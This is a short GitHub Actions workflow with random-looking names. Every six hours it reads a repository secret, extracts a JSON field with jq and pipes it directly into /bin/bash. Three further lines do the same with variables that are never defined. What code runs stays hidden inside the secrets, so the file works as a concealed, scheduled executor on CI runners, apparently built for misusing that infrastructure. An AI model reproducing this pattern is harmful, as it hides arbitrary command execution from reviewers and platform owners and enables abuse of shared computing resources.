name: zhangnubi4567

on:
  workflow_dispatch:
  schedule:
    - cron: '10 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhangnubi4567
        env:
          vek27: ${{ secrets.vek27 }}
        run: |
          echo $vek27 | jq -r .mnjux131 | /bin/bash
          echo $jg31934 | jq -r .vchx6 | /bin/bash
          echo $dxsvs4 | jq -r .oip69288 | /bin/bash
          echo $oy94964 | jq -r .gt832 | /bin/bash

